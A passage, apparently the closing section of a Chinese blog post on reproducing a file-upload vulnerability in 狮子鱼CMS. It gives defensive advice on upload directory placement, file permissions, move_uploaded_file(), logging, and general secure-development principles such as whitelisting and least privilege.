限制文件上传目录与权限将上传目录设置为Web根目录之外如果可能。确保上传目录的权限设置为755文件权限设置为644避免执行权限。使用move_uploaded_file()函数它比copy()或rename()更安全会检查文件是否是合法的HTTP POST上传文件。6. 记录与监控 记录所有上传操作包括时间、IP、用户ID、原始文件名、保存路径等便于事后审计和追踪。7. 从漏洞复现中提炼的通用审计与防御经验这次对狮子鱼CMS文件上传漏洞的复现不仅仅是一次简单的“攻击模仿”更是一次深刻的安全思维训练。它让我再次确认了几个在安全开发中必须坚守的原则第一永远不要信任客户端。无论是前端JS校验、隐藏的表单字段还是HTTP请求头攻击者都可以轻松绕过。所有安全校验必须在服务端进行。第二白名单优于黑名单。定义什么是“允许的”比定义什么是“禁止的”要安全得多。黑名单永远有遗漏而白名单将未知风险挡在门外。第三最小权限原则。上传目录只给写入权限不给执行权限。应用程序运行账户如www-data的权限应被严格限制避免一旦被攻破就导致全盘沦陷。第四深度防御。单一的安全措施容易被绕过。应该构建从身份验证、扩展名检查、MIME检查、内容检查到服务器配置加固的多层防御体系。即使一层被突破其他层还能提供保护。第五安全是一个持续的过程。修复一个已知漏洞后应该对代码进行全面的安全审计检查是否还存在类似问题。同时保持框架和依赖库的更新关注安全社区的动态才能应对不断演变的安全威胁。在渗透测试工作中遇到这类CMS漏洞手工复现的意义在于理解漏洞的每一个细节和上下文这远比使用自动化工具跑出一个结果更有价值。它帮助你建立对系统脆弱点的直觉并在未来自己设计系统时能本能地避开这些“坑”。对于开发者而言每一次漏洞分析报告都应该被视为一次宝贵的学习机会推动着代码朝着更健壮、更安全的方向演进。
